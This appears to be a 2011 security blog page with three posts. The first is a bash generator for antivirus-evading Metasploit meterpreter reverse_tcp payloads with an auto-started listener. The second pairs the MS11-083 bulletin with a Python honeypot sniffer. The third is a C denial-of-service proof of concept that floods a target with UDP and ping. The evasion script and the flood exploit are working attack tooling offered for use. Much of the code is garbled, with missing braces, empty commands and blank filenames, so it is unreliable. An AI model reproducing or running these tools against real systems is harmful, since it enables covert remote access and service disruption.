Nov 12, 2011

FUD Payload Generator for Backtrack By

Today based on Astr0baby’s article on how can we create a fully undetectable metasploit payload, i modified his REVERSE_TCP Payload Generator in order to work with Backtrack 5 distro. Below you can find the modified version and a simple presentation on how it works:

echo "************************************************************"
echo "    Automatic  shellcode generator - FOR METASPLOIT         "
echo "                  By Astr0baby 2011                         "
echo "  With some Randomic gravy and sauce to bypass Antivirus    "  
echo "    For Automatic Teensy programming and deployment         "
echo "************************************************************"

rm -rf ShellCode
echo "Here is a network device list available on yor machine"
cat /proc/net/dev | tr -s  ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
echo -e "What network interface are we gonna use ?  \c"
read interface
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo -e "Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : \c"
read seed
echo -e "And lastly how many times do we want to encode our payloads 1-20? : \c"
read enumber
# Get OS name
IO="" # store IP
case $OS in
   Linux) IP=`ifconfig $interface  | grep 'inet addr:'| grep -v '' | cut -d: -f2 | awk '{ print $1}'`;;
   *) IP="Unknown";;
#echo "$IP"
./msfpayload windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R | ./msfencode -e x86/shikata_ga_nai -c $enumber -t raw | ./msfencode -e x86/jmp_call_additive -c $enumber -t raw | ./msfencode -e x86/call4_dword_xor -c $enumber -t raw |  ./msfencode -e x86/shikata_ga_nai -c $enumber  > test.c  
mkdir ShellCode
mv test.c ShellCode
cd ShellCode
#Replacing plus signs at the end of line
sed -e 's/+/ /g' test.c > clean.c
sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
echo "#include " >> temp
echo 'unsigned char ufs[]=' >> temp
for (( i=1; i<=10000;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp2
sed -i 's/$/"/' temp2
sed -i 's/^/"/' temp2  
echo  ';' >> temp2  
cat temp2 >> temp
cat ready.c >> temp
mv temp ready2.c
echo ";" >> ready2.c
echo "int main(void) { ((void (*)())micro)();}" >> ready2.c  
mv ready2.c final.c
echo 'unsigned char tap[]=' > temp3
for (( i=1; i<=999999;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp4
sed -i 's/$/"/' temp4
sed -i 's/^/"/' temp4
echo  ';' >> temp4
cat temp4 >> temp3
cat temp3 >> final.c  
rm -f clean.c
rm -f test.c
rm -f ready.c
rm -f rand.c
rm -f temp2
rm -f temp3
rm -f temp4 
/usr/bin/i586-mingw32msvc-gcc -Wall ./final.c -o ./final.exe > /dev/null 2>&1
mv final.exe $RANDOM.exe
filex=`ls -ct1 | head -1`
sumx=`sha1sum $filex`
echo $filex "...generated in ShellCode subfolder"
echo $filex "sha1checksum is .." $sumx  
strip --strip-debug $filex
cd ..
echo "      starting the meterpreter listener..."
sleep 2
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port AutoRunScript=' migrate2  explorer.exe'  E

*** you can change metasploit command with the path of your installed metasploit.

In order to be able to compile the generated payload we must install the following packages:
Select All Code:
root@bt:~# apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils


If you like my blog, Please Donate Me

MS11-083 Details And Honeypot.

Microsoft Security Bulletin MS11-083 - Critical

Vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)

Executive Summary

This security update resolves a privately reported vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if an attacker sends a continuous flow of specially crafted UDP packets to a closed port on a target system.

The security update addresses the vulnerability by modifying the way that the Windows TCP/IP stack keeps track of UDP packets within memory. For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.
Recommendation. The majority of customers have automatic updating enabled and will not need to take any action because this security update will be downloaded and installed automatically. Customers who have not enabled automatic updating need to check for updates and install this update manually. For information about specific configuration options in automatic updating, see Microsoft Knowledge Base Article 294871.
For administrators and enterprise installations, or end users who want to install this security update manually, Microsoft recommends that customers apply the update immediately using update management software, or by checking for updates using the Microsoft Update service.
See also the section, Detection and Deployment Tools and Guidance, later in this bulletin.
Known Issues. None

Affected and Non-Affected Software

The following software have been tested to determine which versions or editions are affected. Other versions or editions are either past their support life cycle or are not affected. To determine the support life cycle for your software version or edition, visit Microsoft Support Lifecycle.
Affected Software 
Operating SystemMaximum Security ImpactAggregate Severity RatingBulletins Replaced by this Update
Windows Vista Service Pack 2CriticalRemote Code ExecutionMS11-064
Windows Vista x64 Edition Service Pack 2CriticalRemote Code ExecutionMS11-064
Windows Server 2008 for 32-bit Systems Service Pack 2*CriticalRemote Code ExecutionMS11-064
Windows Server 2008 for x64-based Systems Service Pack 2*CriticalRemote Code ExecutionMS11-064
Windows Server 2008 for Itanium-based Systems Service Pack 2CriticalRemote Code ExecutionMS11-064
Windows 7 for 32-bit Systems and Windows 7 for 32-bit Systems Service Pack 1CriticalRemote Code ExecutionMS11-064
Windows 7 for x64-based Systems and Windows 7 for x64-based Systems Service Pack 1CriticalRemote Code ExecutionMS11-064
Windows Server 2008 R2 for x64-based Systems and Windows Server 2008 R2 for x64-based Systems Service Pack 1*CriticalRemote Code ExecutionMS11-064
Windows Server 2008 R2 for Itanium-based Systems and Windows Server 2008 R2 for Itanium-based Systems Service Pack 1CriticalRemote Code ExecutionMS11-064
*Server Core installation affected. This update applies, with the same severity rating, to supported editions of Windows Server 2008 or Windows Server 2008 R2 as indicated, whether or not installed using the Server Core installation option. For more information on this installation option, see the TechNet articles, Managing a Server Core Installation and Servicing a Server Core Installation. Note that the Server Core installation option does not apply to certain editions of Windows Server 2008 and Windows Server 2008 R2; see Compare Server Core Installation Options.
Non-Affected Software
Operating System
Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 with SP2 for Itanium-based Systems

Frequently Asked Questions (FAQ) Related to This Security Update

Vulnerability Information

Severity Ratings and Vulnerability Identifiers


Honeypot For MS11-083
MS11-083 has arrived and people are getting both excited and scared, it looks like its going to be the next MS08-067. Which if you remember, Conficker used to bend windows over and have a jol. Time for a honeypot?

In any case I took a moment and decided to write a script that would capture potential MS11-083 traffic in an attempt to capture this exploit in the wild (once its out there, might as well start looking). According to the security bulletin “The vulnerability could allow remote code execution if an attacker sends a continuous flow of specially crafted UDP packets to a closed port on a target system”. So that’s exactly what I looked at, I used netstat -un and -lun to find all open and listening ports and filtered them out. UDP packets to a closed port normally results in a ICMP Port Unreachable response or no response at all, so I’ve ignored them.

The code is commented and you need the little bash script in the same folder to get the ports. Remember to make it executable (sudo chmod +x and run as root. It will create a pcap file named the <current datetime.pcap> and any UDP traffic heading towards a closed port will be logged.
Once you have some pcaps and you think they might contain exploit traffic remember that sharing is caring and karma is a bitch, don’t share if it was just Chuck Testa. My code is dirty and I wrote it quickly so don’t hate, feel free to modify and make it better.
I’ll try and add my nmap enumeration script tomorrow, it does a portscan and OS fingerprint on a given host and inserts that data into a sqlitedb. That way you can check if the traffic was coming from a windows host.
With the bash script, just remove the .txt file extension (my hosting is being annoying). Below is the code if you want to have a peek.
from pcapy import *
from impacket import ImpactDecoder, ImpactPacket
from socket import *
import fcntl
import struct
import os
import time

class Sniffer:
    def __init__(self):
        self.promiscuous = True
        self.called = 0 #silly habits
        self.interface = 'eth0'
        self.max_bytes = 65535  # Theoretical max size for a UDP packet
        self.read_timeout = 100
        self.ip = self.get_ip_address(self.interface)
        self.bpf = 'ip dst host %s and not src net'%self.ip

        print "\n---------------------------------------------------"
        print "Sniffing for unsolicited UDP packets to closed ports."
        print "      \"Open ports are for losers\" - MS11-083"
        print "Pcap log started, listening from %s"%time.strftime("%d:%m:%Y %H:%M:%S", time.localtime())
        print "---------------------------------------------------"

    def get_ip_address(self, ifname):
        s = socket(AF_INET, SOCK_STREAM)
        return inet_ntoa(fcntl.ioctl(s.fileno(), 0x8915, struct.pack('256s', ifname[:15]))[20:24])

    def start(self):
        self.reader = open_live(self.interface, self.max_bytes, self.promiscuous, self.read_timeout)
        # Pcapy uses BPF to filter packets, not src net
        # should be changed, it just filters out 1.0, 1.1, 1.2 and 1.3
        # which I use for diffrent gateways and dont want traffic
        # from the router hitting the logs.
        # Run the packet capture loop
        self.reader.loop(0, self.callback)

    def callonce(self):
        self.dumper = self.reader.dump_open(time.strftime("%d-%m-%Y_%H-%M-%S.pcap", time.localtime()))
        self.called = 1

    def callback(self, hdr, data):
        # Parse the Ethernet packet
        decoder = ImpactDecoder.EthDecoder()
        ether = decoder.decode(data)
        # Parse the IP packet inside the Ethernet packet, typep
        iphdr = ether.child()
        udphdr = iphdr.child()

        # First check that the packets are not comming from the local host
        # Then check that it is a UDP packet (incase you changed the BPF) also
        # Check that the destination port for the packet is a closed port on the host
        if (iphdr.get_ip_src() != self.ip):
            if (iphdr.get_ip_p() == ImpactPacket.UDP.protocol and udphdr.get_uh_dport() not in self.portlist):
                if self.called == 0:
                print "Incoming UDP packet from %s"%iphdr.get_ip_src()
                self.dumper.dump(hdr, data)

    def refresh_portlist(self):
        # bash script to get all the open and listening UDP ports
        # used in the callback function as criteria for logging traffic
        output = os.popen("./")
        pl = output.readlines()
        self.portlist = []
        for p in pl:

def main():
    snf = Sniffer()

if __name__ == "__main__":


PoC Code From

cat >> winnuke2011.c << EOF
* MS11-083 DoS/PoC exploit
* ========================
* This attempts to trigger the ICMP refCount overflow  
* in TCP/IP stack of Win7/Vista/Win2k8 hosts. This 
* requires sending 2^32 UDP packets to a host on a closed
* port, or 4,294,967,296 packets. A dereference function
* must be called that is not triggered via UDP but ICMP  
* echo packets. This exploit creates 250 threads and 
* floods a host with UDP packets and then attempts to
* trigger the de-ref using ping. I calculated that it
* would take approximately 52 days for the host to 
* enter a condition where this vulnerability is 
* triggerable. 
* -- prdelka 
#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h> 
#include <sys/time.h> 

int port;
int active = 0;
pthread_mutex_t mutexactive;
void *sendpackets(void *ptr);

int main(int argc, char *argv[]) {
      pthread_t thread;
      int iret,lthreads;
 pid_t pid;
 printf("[+] MS11-083 DoS/PoC exploit\n");
  printf("[!] Usage : %s <server> <port>\n", argv[0]);
 char *const args[] = {"ping",argv[1],NULL};
 char *const envp[] = {"",NULL};
 port = atoi(argv[2]);
 for(lthreads=0;lthreads<250;lthreads++){//UDP flood
  iret = pthread_create(&thread,NULL,sendpackets,argv[1]);
  printf("[-] Thread number %d started\n",lthreads);
 printf("[-] One does not simply barrel roll into Mordor\n");
 pid = fork();
 if(pid==0){// trigger deref.
 printf("[-] You are finished. Patience is a virtue.\n");

void *sendpackets(void *ptr)
 int sd, rc, n, echoLen, flags, error, timeOut;
 unsigned long i;
 struct sockaddr_in remoteServAddr;
 struct hostent *h;
 char str[41];
    for (i = 0;i < 40;++i){
  str[i] = (char)((rand() % 78) + 30);
    str[40] = '\0'; // yes this was off-by-one. :(
 printf("[-] Sending payload '%s'\n",str);
   h = gethostbyname(ptr);
 if(h==NULL) {
      printf("unknown host '%s' \n",(char*)ptr);
 remoteServAddr.sin_family = h->h_addrtype;
 memcpy((char *) &remoteServAddr.sin_addr.s_addr,h->h_addr_list[0], h->h_length);
 remoteServAddr.sin_port = htons(port);
 sd = socket(AF_INET,SOCK_DGRAM,0);
  printf("[!] Cannot open socket\n");
 flags = 0;
  rc = sendto(sd,str,strlen(str)+1,flags,(struct sockaddr *)&remoteServAddr,sizeof(remoteServAddr));
   printf("[!] Cannot send data\n");
cat >> << EOF
while \`true\`;do /sbin/ping -c 1 \$1;done
chmod +x
gcc winnuke2011.c -o winnuke2011 

If you like my blog, Please Donate Me